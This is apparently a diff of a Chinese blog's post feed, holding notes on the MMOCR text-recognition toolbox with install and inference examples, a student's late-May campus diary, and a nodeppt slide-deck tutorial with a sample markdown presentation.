    ​我们提出了 MMOCR——一个开源工具箱,它提供了一个全面的管道文本检测和识别,以及其下游任务,如命名实体识别和关键信息提取。MMOCR 实现了 14 种最先进的算法,这比我们迄今为止所知道的所有现有开源 OCR 项目都要多得多。为了促进文本识别相关问题的未来研究和工业应用,我们还提供了大量的训练模型和详细的基准测试,以给予深入了解文本检测,识别和理解的性能。MMOCR 在 https://github.com/open-mmlab/mmocr 上公开发布。

    1 INTRODUCTION

    ​不同的方法利用不同的培训数据集,优化策略(例如,优化者,学习率时间表,时期数字,预训练的权重和数据增强管道)和网络设计(例如网络体系结构和损失)。为了涵盖各种模型中使用的组件多样性,我们提出了 MMOCR 工具箱,该工具箱涵盖了统一框架中最近流行的文本检测,识别和理解方法。截至目前,工具箱实现了七种文本检测方法,五个文本识别方法,一种关键信息方法和一种命名实体识别方法。整合各种算法赋予代码可重复使用性,因此大大简化了算法的实现。此外,统一框架允许公平地比较不同的方法,并且可以轻松研究其关键有效组件。据我们所知,MMOCR 在各种开源工具箱中重新实现了最深入的基于学习的文本检测和识别方法,我们认为这将促进未来的文本检测,识别和理解研究。

    ​MMOCR 在 Apache-2.0 许可证下在 https://github.com/open-mmlab/mmocr 上公开发布。该存储库包含所有源代码和详细文档,包括安装说明、数据集准备脚本、API 文档、模型动物园、教程和用户手册。MMOCR 重新实现了十多个最先进的文本检测、识别和理解算法,并提供了在流行的学术数据集上训练的广泛基准和模型。为了支持多语言 OCR 任务,MMOCR 还发布了在工业数据集上训练的中文文本识别模型。除了(分布式)培训和测试脚本,MMOCR 还提供了一套丰富的实用工具,涵盖了可视化、演示和部署。MMOCR 提供的模型很容易转换为 Onnx,它得到了部署框架和硬件设备的广泛支持。因此,它对学术研究人员和工业开发人员都很有用。

    • 文本检测。文本检测旨在将文本实例的边界框进行定位。最近的研究重点已转移到具有挑战性的 arbitrary-shaped text detection

      • Mask R-CNN 可用于检测文本,由于基于矩形的 ROI 建议,它可能无法检测弯曲和密集的文本。
      • 另一方面,TextSnake 用一系列有序的重叠圆盘来描述文本实例。
      • PSENet 提出了一种渐进式规模扩展网络,可以区分位置接近的弯曲文本实例。
      • DB 通过向分割网络提出可微分二值化函数来简化场景文本分割的二值化后处理,其中图像概率图的每个点处的阈值可以自适应地预测。
    • 文本识别。文本识别由于能够从文本图像中提取丰富的语义信息而受到越来越多的关注。

      • 卷积递归神经网络(CRNN)使用端到端的可训练神经网络,该网络由用于特征提取的深度卷积神经网络(DCNN),用于顺序预测的递归神经网络(RNN)和用于产生标签序列的转录层组成。
      • RobustScanner 能够通过使用新的位置增强分支和动态融合模块来识别无上下文文本,从而减轻随机文本图像的误识别问题。
      • 已努力将不规则文本输入纠正为与典型文本识别器兼容的规则文本。例如,薄板样条(TPS)变换在深度神经网络中使用,该深度神经网络结合了空间 Transformer 网络(STN)和序列识别网络(SRN),以在将弯曲和透视文本输入 SRN 之前纠正它们。
    • 关键信息提取。非结构化文档图像(如收据或信用票据)的关键信息提取(KIE)最主要用于办公自动化任务,包括高效存档和合规性检查。传统的方法,如模板匹配,不能很好地推广看不见的模板的文档。提出了几种模型来解决泛化问题。

      • 例如,CloudScan 使用 NER 来分析整个发票的连接一维文本序列。
      • Chargrid 将每个文档页面编码为一个二维字符网格进行语义分割,但由于它只覆盖了小邻域的二维空间布局信息,不能充分利用文本区域之间的非局部、远距离的空间关系。
      • 最近,已经开发了一种端到端的空间双模态图推理(SDMG-R)模型,该模型对文本识别错误特别鲁棒。它将非结构化文档图像建模为空间双模态图,图节点作为检测到的文本框,图边缘作为节点之间的空间关系。
    • 命名实体识别。命名实体识别(NER)旨在定位命名实体并将其分类为预定义的类别,例如个人或组织的名称。它们基于双向 LSTM 或条件随机场。

    webp

    • 开源 OCR 工具箱。多年来,已经开发了几种开源 OCR 工具箱,以满足学术界和行业的日益增长的需求。
      • Tesseract 是开源 OCR 工具箱的先驱。它于 2005 年公开发布,并提供了 CLI 工具来从图像中提取印刷字体文本。最初,它遵循了传统的分步管道,其中包括连接的组件分析,文本线查找,基线拟合,固定的音高检测和切碎,比例的单词查找和单词识别。现在,它支持基于 LSTM 的 OCR 引擎,并支持 100 多种语言。
      • 基于深度学习的开源 OCR Toolbox Easyocr 于最近发布。它为工业用户提供了简单的 API,并支持 80 多种语言。它实施了工艺检测器和 CRNN 识别器。但是,它仅用于推理,不支持模型培训。
      • Centernocr 是另一个流行的开源 OCR 工具箱。它分别使用 Yolo-V3 和 CRNN 进行文本检测和识别,并使用 OpenCV DNN 进行深层模型推断。
      • 相比之下,Chineseocr_lite 提供了轻巧的中文检测和识别工具箱,该工具箱使用 DB 检测文本和 CRNN 来识别文本。它提供了基于 NCNN 和 TNN 的远期推理,并且可以轻松地在 Windows,Linux 和 Android 等多个平台上部署。
      • Paddleocr 是基于 PaddlePaddle 的实用开源 OCR 工具箱,可以部署在 Linux,Windows 和 MacOS 等多个平台上。目前,它支持 80 多种语言并实施三种文本检测方法(EAST,DB 和 SAST),五种识别方法(CRNN,Rosetta,Star-Net,RAGE 和 SRN),以及一种端到端的文本发现方法(PGNET)。

    3 TEXT DETECTION STUDIES

    ​深度学习模型的性能受许多重要因素影响。在本节中,我们研究了网络架构的主干和颈部。我们在不同基于分割的文本检测方法之间交换上述组件,以衡量性能和计算复杂度的影响。

    webp

    Backbone。ResNet18 和 ResNet50 在文本检测方法中常被使用。为了实际应用,我们还介绍了一种适用于 GPU 的轻量级主干 ddrnet23-slim。表中比较了将 ResNet18、ResNet50 和 ddrnet23-slim 插入 PSENet、PAN 和 DB 中的 FLOPs 和 H-mean。结果显示,ddrnet23-slim 的表现略逊于 ResNet18 和 ResNet50,其 FLOPs 分别仅为 ResNet18 和 ResNet50 的 45% 和 21%。

    webp

    Neck。PSENet、PAN 和 DB 提出了不同的类似 FPN 的颈部结构来融合多尺度特征。我们在表中的实验结果显示,PSENet 中提出的 FPNF 可以在 PSENet 和 DB 中达到最佳的 H-mean。然而,它的 FLOPs 明显高于 DB 中提出的 PFNC 和 PAN 中提出的 FPEM_FFM。相比之下,FPEM_FFM 在 PAN 中拥有最低的 FLOPs,并且达到最佳的 H-mean。

    4 CONCLUSIONS

    ​我们已经公开发布了 MMOCR,这是一个涵盖文本检测、识别和理解的综合工具包。MMOCR 已经实现了 14 种最先进的算法,比所有现有的开源 OCR 项目都要多。此外,它提供了广泛的训练模型、基准测试、详细的文档和实用工具。在本报告中,我们广泛地将 MMOCR 与其他开源 OCR 项目进行了比较。此外,我们还引入了一种适用于 GPU 的轻量级主干 ddrnet23-slim,并对主干和颈部的影响进行了认真研究,以指导工业应用中的检测性能和计算复杂度。

    代码

    安装

    ​创建虚拟环境:

    1
    2
    conda create -n open-mmlab python=3.8
    conda activate open-mmlab

    ​离线安装 pytorch 和 torchvision:

    1
    2
    pip install torch-1.13.1+cu117-cp38-cp38-win_amd64.whl
    pip install torchvision-0.14.1+cu117-cp38-cp38-win_amd64.whl

    ​使用 MIM 安装 MMEngineMMCVMMDetection

    1
    2
    3
    4
    pip install -U openmim
    mim install mmengine
    mim install mmcv
    mim install mmdet

    ​从 open-mmlab/mmocr: OpenMMLab Text Detection, Recognition and Understanding Toolbox (github.com) 获取代码,进这个文件夹:

    1
    2
    3
    pip install -v -e .
    # "-v" 会让安装过程产生更详细的输出
    # "-e" 会以可编辑的方式安装该代码库,你对该代码库所作的任何更改都会立即生效

    推理

    ​快速开始:

    1
    2
    from mmocr.apis import MMOCRInferencer
    ocr = MMOCRInferencer(det='DBNet', rec='CRNN')
    • 要用 MMOCR 的预训练模型进行推理,只需要把它的名字传给参数 det,权重将自动从 OpenMMLab 的模型库中下载和加载。此处记录了 MMOCR 中可以通过该方法初始化的所有模型。

      1
      MMOCRInferencer(det='DBNet')
    • 要加载自定义的配置和权重,你可以把配置文件的路径传给 det,把权重的路径传给 det_weights

      1
      MMOCRInferencer(det='path/to/dbnet_config.py', det_weights='path/to/dbnet.pth')
    • 默认情况下,MMEngine 会在训练模型时自动将配置文件转储到权重文件中。如果你有一个在 MMEngine 上训练的权重,你也可以将权重文件的路径传递给 weights,而不需要指定 model

      1
      2
      # 如果无法在权重中找到配置文件,则会引发错误
      inferencer = TextDetInferencer(weights='path/to/dbnet.pth')
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    Loads checkpoint by http backend from path: https://download.openmmlab.com/mmocr/textdet/dbnet/dbnet_resnet50-oclip_1200e_icdar2015/dbnet_resnet50-oclip_1200e_icdar2015_20221102_115917-bde8c87a.pth
    Downloading: "https://download.openmmlab.com/mmocr/textdet/dbnet/dbnet_resnet50-oclip_1200e_icdar2015/dbnet_resnet50-oclip_1200e_icdar2015_20221102_115917-bde8c87a.pth" to C:\Users\XXX/.cache\torch\hub\checkpoints\dbnet_resnet50-oclip_1200e_icdar2015_20221102_115917-bde8c87a.pth
    100%|███████████████████████████████████████████████████████████████████████████████| 107M/107M [00:17<00:00, 6.50MB/s]
    05/30 10:22:37 - mmengine - WARNING - Failed to search registry with scope "mmocr" in the "function" registry tree. As a workaround, the current "function" registry in "mmengine" is used to build instance. This may cause unexpected failure when running the built modules. Please check whether "mmocr" is a correct scope, or whether the registry is initialized.
    C:\Users\XXX\.conda\envs\openmmlab\lib\site-packages\mmengine\visualization\visualizer.py:196: UserWarning: Failed to add <class 'mmengine.visualization.vis_backend.LocalVisBackend'>, please provide the `save_dir` argument.
    warnings.warn(f'Failed to add {vis_backend.__class__}, '
    Loads checkpoint by http backend from path: https://download.openmmlab.com/mmocr/textrecog/crnn/crnn_mini-vgg_5e_mj/crnn_mini-vgg_5e_mj_20220826_224120-8afbedbb.pth
    Downloading: "https://download.openmmlab.com/mmocr/textrecog/crnn/crnn_mini-vgg_5e_mj/crnn_mini-vgg_5e_mj_20220826_224120-8afbedbb.pth" to C:\Users\XXX/.cache\torch\hub\checkpoints\crnn_mini-vgg_5e_mj_20220826_224120-8afbedbb.pth
    100%|█████████████████████████████████████████████████████████████████████████████| 91.8M/91.8M [00:13<00:00, 6.96MB/s]
    The model and loaded state dict do not match exactly

    unexpected key in source state_dict: data_preprocessor.mean, data_preprocessor.std
    1
    ocr('demo/demo_text_ocr.jpg', show=True, print_result=True)

    webp

    ​看来它默认不支持中文和弯曲文本……

    webp

    ]]>
    @@ -1809,7 +1809,7 @@ /posts/Diary-17-%E9%9B%8F%E8%8D%B7%E6%97%A5%E5%BD%93%E5%8D%88%EF%BC%81/ - 前言

    每日任务

    ​这两周一次都没有出校门……

    ​6.1 和 6.2 这两天屋顶装修,把我的每日任务点拦在了围栏外,只好找个远点的差不多的视角凑合一下了。

    正文

    5.20

    ​由于前一天在北京一阵发疯,凡哥和 77 直接宿舍开躺,而我这天早上居然没有什么身体不适的症状,体力给我练出来了。Go to 实验室 good good study。

    5.23

    ​又是热炸的一天🥵。实验室的空调属实不行!

    我们空调是坏了还是不开了
    坏了吗
    没感觉啊
    小了吧
    31.1 度
    我不能接受
    可能是小了点
    或许可以去图书馆
    我也是这么想的

    ​在开学的第 88 天洗完了第 90 次澡后,决定去图书馆换个学习环境,然后也又又又又又又又又(我也不知道是几个又了😭)要开始备考英语六级了!

    5.24

    ​天气热了,醒得早了。这段时间都是 6:00 左右醒来去实验室,而学校图书馆要 8:00 才开,还得再倒点时差。

    空荡荡

    ​现在是毕业季,准备考研的人也不多,不用特意卡时间,好评!

    ​冀大图书馆的配置还是很不错的,有插座,装修宽敞漂亮(每日夸冀大 1/1)。就是一个学校真的不能把厕所卫生搞清楚吗(每日骂冀大 1/1)?

    ​结果英语写一半突然要去学院楼开会……

    今天(5 月 24 日)上午 10:00 在 C1-535 开班会,评选第 22 期发展对象,全体同学都要参加,请大家互相提醒按时参加@全体成员

    ​本来想直接翘掉的,但是之前答应过一个同学要投她的票,得说到就到。只好再出来……

    毕业快乐!

    ​图书馆前的小广场里已经有了许多穿着毕业服的人,明年今日自己会如何呢?

    ​散会。午休完继续蹲图书馆。

    黑漆漆

    ​下班!

    5.25

    ​这天保定下起了个人觉得不是很大的雨,结果学校里直接内涝……这个基建是不是有点问题?

    5.26

    关某今天有没有时间打球
    阳哥受死😍

    ​周末跟阳哥打个羽毛球运动下。第一把没进入状态 5-11 寄了,后面发现了阳哥的技术弱点,然后他就再也赢不了我了。

    5.27

    图书馆门口

    ​毕业的氛围越来越浓了。

    砍树

    ​冀大突然砍了一堆树,据说要盖新楼了。突然就感觉校园空旷了起来。

    5.30

    盛夏

    ​图书馆门口的小池塘种上了莲花。查了下保定虽然坐拥古莲池和白洋淀,但保定的市花居然不是莲花,而是同北京一样是月季。

    6.1

    PVZ

    这开局牛逼
    6 啊

    ​77 玩起了现在很火的《植物大战僵尸杂交版》,我也凑热闹地去试了试,居然治好了我的电子阳痿。

    6.2

    毕业答辩

    ​师兄师姐要毕业答辩了!去凑个热闹。

    ​虽然导师事先说答辩上的老师都是事先打过招呼的,但答辩的时候有个女老师还是提了一些比较尖锐的问题;有些老师就没咋提论文技术方面的问题,化身列文虎克在文章格式上挑刺;还有个老师还迟到了,绝。中间还有个师兄在上面讲完了他的工作,有个老师提问的时候没发现她拿错了论文,笑死。

    ​看完上半场,撤!最后走个形式大家都过了。

    bbtime

    ]]>
    + 前言

    每日任务

    ​这两周一次都没有出校门……

    ​6.1 和 6.2 这两天屋顶装修,把我的每日任务点拦在了围栏外,只好找个远点的差不多的视角凑合一下了。

    正文

    5.20

    ​由于前一天在北京一阵发疯,凡哥和 77 直接宿舍开躺,而我这天早上居然没有什么身体不适的症状,体力给我练出来了。Go to 实验室 good good study。

    5.23

    ​又是热炸的一天🥵。实验室的空调属实不行!

    我们空调是坏了还是不开了
    坏了吗
    没感觉啊
    小了吧
    31.1 度
    我不能接受
    可能是小了点
    或许可以去图书馆
    我也是这么想的

    ​在开学的第 88 天洗完了第 90 次澡后,决定去图书馆换个学习环境,然后也又又又又又又又又(我也不知道是几个又了😭)要开始备考英语六级了!

    5.24

    ​天气热了,醒得早了。这段时间都是 6:00 左右醒来去实验室,而学校图书馆要 8:00 才开,还得再倒点时差。

    空荡荡

    ​现在是毕业季,准备考研的人也不多,不用特意卡时间,好评!

    ​冀大图书馆的配置还是很不错的,有插座,装修宽敞漂亮(每日夸冀大 1/1)。就是一个学校真的不能把厕所卫生搞清楚吗(每日骂冀大 1/1)?

    ​结果英语写一半突然要去学院楼开会……

    今天(5 月 24 日)上午 10:00 在 C1-535 开班会,评选第 22 期发展对象,全体同学都要参加,请大家互相提醒按时参加@全体成员

    ​本来想直接翘掉的,但是之前答应过一个同学要投她的票,得说到就到。只好再出来……

    毕业快乐!

    ​图书馆前的小广场里已经有了许多穿着毕业服的人,明年今日自己会如何呢?

    ​散会。午休完继续蹲图书馆。

    黑漆漆

    ​下班!

    5.25

    ​这天保定下起了个人觉得不是很大的雨,结果学校里直接内涝……这个基建是不是有点问题?

    5.26

    关某今天有没有时间打球
    阳哥受死😍

    ​周末跟阳哥打个羽毛球运动下。第一把没进入状态 5-11 寄了,后面发现了阳哥的技术弱点,然后他就再也赢不了我了。

    5.27

    图书馆门口

    ​毕业的氛围越来越浓了。

    砍树

    ​冀大突然砍了一堆树,据说要盖新楼了。突然就感觉校园空旷了起来。

    5.30

    盛夏

    ​图书馆门口的小池塘种上了莲花。查了下保定虽然坐拥古莲池和白洋淀,但保定的市花居然不是莲花,而是同北京一样是月季。

    6.1

    PVZ

    这开局牛逼
    6 啊

    ​77 玩起了现在很火的《植物大战僵尸杂交版》,我也凑热闹地去试了试,居然治好了我的电子阳痿。

    6.2

    毕业答辩

    ​师兄师姐要毕业答辩了!去凑个热闹。

    ​虽然导师事先说答辩上的老师都是事先打过招呼的,但答辩的时候有个女老师还是提了一些比较尖锐的问题;有些老师就没咋提论文技术方面的问题,化身列文虎克在文章格式上挑刺;还有个老师还迟到了,绝。中间还有个师兄在上面讲完了他的工作,有个老师提问的时候没发现她拿错了论文,笑死。

    ​看完上半场,撤!最后走个形式大家都过了。

    bbtime

    ]]>
    @@ -1836,7 +1836,7 @@ /posts/Web-nodeppt/ - 看一看

    耍一耍

    链接 / iframe:

    ​一个 #weblides 就是一个幻灯片对象,一个 <section/> 就是一个幻灯片页面,#section-X 表示第 X 页。

    • 快捷键:
      • Page 翻页: /// Space Home End
      • Fullscreen 全屏: F
      • Overview 大纲: -/+
      • Speaker Note 演讲者笔记: N
      • Grid Background 网格背景: Enter

    写一写

    ​新建一个文件夹,打开命令行,安装 nodeppt

    npm install -g nodeppt

    ​由于这个库有点旧,在新的 nodejs 上运行会报错。需要打开对应的 package.json 修改一下内容:

    webp

    ​在 "scripts":{} 下插入 "serve": "SET NODE_OPTIONS=--openssl-legacy-provider",

    ​之后每次执行 nodeppt 的命令前都必须执行:

    set NODE_OPTIONS=--openssl-legacy-provider

    ​回到文件夹,创建一个 index.md,编写如下内容:

    ​至于 nodeppt 中特有的语法,有时间再慢慢研究吧……

    title: nodeppt - 这可能是迄今为止最好的网页版演示库
    speaker: 三水清
    url: https://github.com/ksky521/nodeppt
    js:
    - https://echarts.cdn.apache.org/zh/asset/theme/infographic.js
    plugins:
    - echarts: {theme: infographic}
    - mermaid: {theme: forest}
    - katex

    <slide class="bg-black-blue aligncenter" image="https://cn.bing.com/az/hprichbg/rb/RainierDawn_EN-AU3730494945_1920x1080.jpg .dark">

    # nodeppt {.text-landing.text-shadow}

    这可能是迄今为止最好的网页版演示库 {.text-intro.animated.fadeInUp.delay-500}

    [:fa-github: Github](https://github.com/ksky521/nodeppt){.button.ghost.animated.flipInX.delay-1200}

    <slide :class="size-30 aligncenter">

    ### Install

    ---

    `npm install -g nodeppt` {.animated.fadeInUp}

    <slide :class="size-40 aligncenter">

    ### Commands

    ---

    ```shell {.animated.fadeInUp}
    # create a new slide with an official template
    $ nodeppt new slide.md

    # create a new slide straight from a github template
    $ nodeppt new slide.md -t username/repo

    # start local sever show slide
    $ nodeppt serve slide.md

    # to build a slide
    $ nodeppt build slide.md
    ```

    <slide class="bg-gradient-r" :class=" size-40 aligncenter" image="https://cn.bing.com/az/hprichbg/rb/WinterLynx_ZH-CN7158207296_1920x1080.jpg .dark">

    ## Demo Contents

    ---

    * Keyboard Shortcuts {.animated.fadeInUp}
    * CSS Syntax {.animated.fadeInUp.delay-400}
    * Background {.animated.fadeInUp.delay-800}
    * Animation {.animated.fadeInUp.delay-1200}
    * Content Position {.animated.fadeInUp.delay-1600}
    * Quotes {.animated.fadeInUp.delay-2s}
    * Plugins\: echarts/mermaid/ketax {.animated.fadeInUp.delay-2400}
    * Others\: Button/Table.. {.animated.fadeInUp.delay-2800}
    * Speaker mode.. {.animated.fadeInUp.delay-3200}

    <slide :class="size-60 aligncenter">

    ## Keyboard Shortcuts

    ---

    - Page\: ↑/↓/←/→ Space Home End
    - Fullscreen\: F
    - Overview\: -/+
    - Speaker Note\: N
    - Grid Background\: Enter

    :::note

    ## Note here

    :::
    <slide :class="size-50">

    ## :fa-heart-o: CSS Syntax

    WebSlides is so easy to understand and love. Baseline\: 8. {.text-intro}

    * :Typography\::{.text-label} .text-landing, .text-subtitle, .text-data, .text-intro...
    * :BG Colors\::{.text-label} .bg-primary, .bg-blue,.bg-apple...
    * :BG Images\::{.text-label} .background, .background-center-bottom...
    * :Sizes\::{.text-label} .size-50, .size-40...
    * :Component\::{.text-label} card, flexblock, gallery...
    * :Animation\::{.text-label} autoplay, animate.css...
    {.description}

    <slide :class="size-50 aligncenter">

    ## Text Classes

    <slide class="aligncenter">

    # Landings {.text-landing}

    `.text-landing`

    <slide class="aligncenter">

    # Landings {.text-landing}

    Create a simple web presence. {.text-intro}

    `.text-intro`

    <slide class="aligncenter">

    POWERED BY [#WEBSLIDES](https://twitter.com/search?f=tweets&vertical=default&q=%23WebSlides&src=typd) `.text-subtitle` {.text-subtitle}

    # Landings {.text-landing}

    Create a simple web presence. {.text-intro}

    `.text-intro`

    <slide class="bg-black aligncenter" image="https://cn.bing.com/az/hprichbg/rb/RedAntarctica_EN-AU12197122155_1920x1080.jpg">

    # **Landings** {.text-landing.text-shadow}

    `.text-shadow` {.text-intro}

    <slide class="bg-apple aligncenter">

    ## 4,235,678 {.text-data}

    `.text-data`

    <slide>

    Why WebSlides? .text-context {.text-content}

    ## WebSlides is incredibly easy and versatile. The easiest way to make HTML presentations.

    <slide>

    `.text-cols (2 columns)`

    :::div {.text-cols}

    **Why WebSlides?** There are excellent presentation tools out there. WebSlides is about sharing content, essential features, and clean markup. **Each parent &lt;slide&gt;** in the #webslides element is an individual slide.

    **WebSlides help you build a culture of innovation and excellence**. When you're really passionate about your job, you can change the world. How to manage a design-driven organization? Leadership through usefulness, openness, empathy, and good taste.

    :::

    :::flexblock {.metrics}

    :fa-phone:

    Call us at 555.345.6789

    ----

    :fa-twitter:

    @username

    ----

    :fa-envelope:
    Send us an email
    :::

    <slide :class="size-50 aligncenter">

    ## Backgrounds

    <slide>

    ## Corporate Backgrounds

    :::flexblock {.blink.border}

    ## .bg-primary {..bg-primary}

    \#44d

    ---

    ## .bg-secondary {..bg-secondary}

    \#67d

    ---

    ## .bg-light {..bg-light}

    \#edf2f7

    ---

    ## body

    \#f7f9fb

    :::

    ---

    ## General Colors

    :::flexblock {.blink.border}

    ## .bg-black {..bg-black}

    \#111

    ---

    ## .bg-black-blue {..bg-black-blue}

    \#123

    ---

    ## .bg-white {..bg-white}

    \#fff
    :::

    <slide>

    ## Colorful

    :::flexblock {.border.blink}

    ## .bg-red {..bg-red}

    \#c23

    ---

    ## .bg-green {..bg-green}

    \#077

    ---

    ## .bg-blue {..bg-blue}

    \#346

    ---

    ## .bg-purple {..bg-purple}

    \#62b

    :::

    ---

    ### Transparent Backgrounds

    :::flexblock {.border.blink}

    ## .bg-trans-dark {..bg-trans-dark}

    rgba(0, 0, 0, 0.5)

    ---

    ## .bg-trans-light {..bg-trans-light}

    rgba(255, 255, 255, 0.2)

    :::

    <slide class="bg-gradient-h">

    # Gradients

    :::flexblock {.border}

    Horizontal
    `.bg-gradient-h`

    ---

    Radial
    `.bg-gradient-r`

    ---

    Vertical
    `.bg-gradient-v`
    :::

    <slide class="bg-gradient-v aligncenter">

    ## Vertical Gradient

    `.bg-gradient-v`

    <slide class="bg-gradient-r aligncenter">

    ## Radial Gradient

    `.bg-gradient-r`

    <slide class="bg-black" video="https://webslides.tv/static/videos/working.mp4 poster='https://webslides.tv/static/images/working.jpg'" >

    `.background-video`

    ## **WebSlides is the easiest way to make HTML presentations. Inspire and engage.**

    <slide class="bg-blue aligncenter" video="https://webslides.tv/static/videos/working.mp4 poster='https://webslides.tv/static/images/working.jpg' .dark">

    ## BG Video with Overlay {.text-landing}

    `<slide class="bg-blue aligncenter" video="https://webslides.tv/static/videos/working.mp4 poster='https://webslides.tv/static/images/working.jpg' .dark">` or `.light`

    <slide class="fullscreen bg-blue" youtube=".dark id='_m67JbGjWnc' autoplay loop" :class="aligncenter">

    ## **Youtube Background**

    `<slide youtube=".dark id='_m67JbGjWnc' autoplay loop">`

    <slide image="https://webslides.tv/static/images/iphone-hand.png .right-bottom">

    :::{.content-left}

    ### .background-(position)

    :::flexblock {.specs}
    ::fa-wifi::

    ## Ultra-Fast WiFi

    Simple and secure file sharing.

    ---

    ::fa-battery-full::

    ## All day battery life

    Your battery worries may be over.

    ---

    ::fa-life-ring::

    ## All day battery life

    We'll fix it or if we can't, we'll replace it.

    :::

    <slide :class="size-50 aligncenter">

    ## Components

    <slide :class="size-60">

    ## Shadowbox

    `:::shadowbox`

    ---

    :::shadowbox

    ## We're web people.

    There're excellent presentation tools out there. WebSlides is about telling the story, and sharing it in a beautiful way. Hypertext and clean code as narrative elements.

    ---

    ## Work better, faster.

    Designers, marketers, and journalists can now focus on the content. Simply [choose a demo](https://webslides.tv/demos) and customize it in minutes.

    :::

    <slide :class="size-80">

    :::card

    ## Card

    .card-50.bg-white

    [Unsplash](http://Unsplash.com) is a really cool resource. It is a collection of Creative Commons Zero licensed photos that are really great. {.text-intro}

    - :Role\::{.text-label} Frontend
    - :client\::{.text-label} Acme
    - :year\::{.text-label} 2018
    {.description}

    ---

    ![](https://source.unsplash.com/rCOWMC8qf8A/)

    :::

    <slide class="fullscreen">

    :::card

    ![](https://source.unsplash.com/ALtNa-uKy3M/)

    ---

    ## Bonsai

    Bonsai is a Japanese art form using trees grown in containers — **.fullscreen > .card-50.** {.text-intro}

    Similar practices exist in other cultures, including the Chinese tradition of penjing from which the art originated, and the miniature living landscapes of Vietnamese hòn non bộ.

    :::

    <slide class="aligncenter">

    ## **Flexible blocks**

    `:::flexblock` = Flexible blocks with auto-fill and equal height.

    <slide>

    ## Flexblock

    :::flexblock

    ## :fa-bar-chart: Purpose

    Businesses that people love5

    ---

    ## :fa-bar-chart: Purpose

    Businesses that people love6

    ---

    ## :fa-balance-scale: Purpose

    Businesses that people love7

    ---

    ## :fa-cog: Purpose

    Businesses that people love8

    :::

    ---

    ## Flexblock `{.blink.border}`

    :::flexblock {.blink.border}

    ## :fa-bar-chart: Purpose

    Businesses that people love1

    ---

    ## :fa-bar-chart: Purpose

    Businesses that people love2

    ---

    ## :fa-balance-scale: Purpose

    Businesses that people love3

    ---

    ## :fa-cog: Purpose

    Businesses that people love4

    :::

    <slide>

    ## Flexblock clients

    `{.clients}`

    :::flexblock {.clients}

    ![](https://webslides.tv/static/images/logos/google.svg){.blacklogo}

    ### Interfaces

    Collaboration with the Acme team to design their mobile apps.

    ---

    ![](https://webslides.tv/static/images/logos/microsoft.svg) {.blacklogo}

    ### Interfaces

    Collaboration with the Acme team to design their mobile apps.

    ---

    ![](https://webslides.tv/static/images/logos/instagram.svg){.blacklogo}

    ### Interfaces

    Collaboration with the Acme team to design their mobile apps.

    ---

    ![](https://webslides.tv/static/images/logos/netflix.svg){.blacklogo}

    ### Interfaces

    Collaboration with the Acme team to design their mobile apps.

    :::

    <slide :class="size-70">

    ### Gallery

    `:::gallery`

    :::gallery

    ![](https://source.unsplash.com/uPGOEbjbVGA/800x600)

    ## Alicia Jiménez

    Founder & CEO

    ---

    ![](https://source.unsplash.com/6anudmpILw4/800x600)

    ## Sam Trololovitz

    Master of nothing

    ---

    ![](https://source.unsplash.com/IFxjDdqK_0U/800x600)

    ## Erin Gustafson

    VP of Design

    :::

    <slide :class="size-80">

    ### Gallery overlay

    `:::gallery-overlay`

    :::gallery-overlay

    ![](https://source.unsplash.com/uPGOEbjbVGA/800x600)

    ## Alicia Jiménez

    Founder & CEO

    ---

    ![](https://source.unsplash.com/zhkTCCmD4xI/800x600)

    ## Sam Trololovitz

    CTO

    ---

    ![](https://source.unsplash.com/IFxjDdqK_0U/800x600)

    ## Erin Gustafson

    VP of Design

    :::

    <slide class="bg-red frame">

    :::cta

    ::^\$^40::

    ---

    ## Watch TV shows anytime, anywhere

    .frame.bg-red

    :::


    <slide class="bg-black-blue">

    ## Grid Columns

    :::column

    ### **:fa-line-chart: Design**

    Design for growth. We've built a team of world-class designers, developers, and managers.

    ---

    ### **:fa-film: Videos**

    We connect your audience needs, business goals, and brand values into a strategy.

    ---

    ### **:fa-users: Users**

    We offer personalized services with deep expertise in design and technology.

    ---

    ### **:fa-graduation-cap: Teams**

    We train teams to help organizations succeed in the digital age.
    :::

    <slide :class="size-50 aligncenter">

    ## Animations

    <slide :class="aligncenter">

    ## Autoplay Animation

    `.animated.lightSpeedIn.slow` {.lightSpeedIn.animated.slow}

    <slide :class="size-50">

    ### **animate.css** + `.build`

    ---

    1. **fadeIn**{.bounce}
    2. **swing**{.swing}
    3. **flash**{.flash}
    4. **pulse**{.pulse}
    5. **shake**{.shake}
    6. **bounceIn**{.bounceIn}
    7. **wobble**{.wobble}
    8. **fadeInLeft**{.fadeInLeft}
    9. **flipInX**{.flipInX}
    10. **tada**{.tada}
    11. **slideInUp**{.slideInUp}
    12. **jello**{.jello}
    13. **heartBeat**{.heartBeat}
    14. **fadeInUp**{.fadeInUp}
    15. **lightSpeedIn**{.lightSpeedIn}
    {.text-cols.build}

    <slide class="bg-black aligncenter" image="https://source.unsplash.com/n9WPPWiPPJw/ .anim">

    ## .background.anim

    <slide :class="size-50 aligncenter">

    ## Content Position

    <slide class="slide-top">
    :::{.content-left}

    ### 1/9 left top

    Put content wherever you want. Have less. Do more. Create beautiful solutions.

    `.slide-top and .content-left`


    <slide class="slide-top">
    :::{.content-center}

    ### 2/9 center top

    In a village of La Mancha, the name of which I have no desire to call to mind,

    `.slide-top and .content-center`

    <slide class="slide-top">
    :::{.content-right}

    ### 3/9 right top

    there lived not long since one of those gentlemen that keep a lance in the lance-rack, an old buckler, a lean hack, and a greyhound for coursing.

    `.slide-top and .content-right`


    <slide>
    :::{.content-left}

    ### 4/9 left top

    An olla of rather more beef than mutton, a salad on most nights, scraps on Saturdays,

    `.content-left`

    <slide>
    :::{.content-center}

    ### 5/9 center top

    lentils on Fridays, and a pigeon or so extra on Sundays, made away with three-quarters of his income.

    `.content-center`

    <slide>
    :::{.content-right}

    ### 6/9 right top

    he rest of it went in a doublet of fine cloth and velvet breeches and shoes to match for holidays,

    `.content-right`


    <slide class="slide-bottom">
    :::{.content-left}

    ### 7/9 left bottom

    while on week-days he made a brave figure in his best homespun.

    `.slide-bottom` and `.content-left`


    <slide class="slide-bottom">
    :::{.content-center}

    ### 8/9 center bottom

    He had in his house a housekeeper past forty, a niece under twenty, and a lad for the field and market-place,

    `.slide-bottom` and `.content-center`

    <slide class="slide-bottom">
    :::{.content-right}

    ### 9/9 right bottom

    who used to saddle the hack as well as handle the bill-hook.

    `.slide-bottom` and `.content-right`

    <slide class="bg-black slide-bottom" image="https://source.unsplash.com/RSOxw9X-suY/">

    :::div {.content-left}
    :fa-tree large:

    ## 1,000,000

    ### We're working to protect up to a million acres of sustainable forest.

    :::


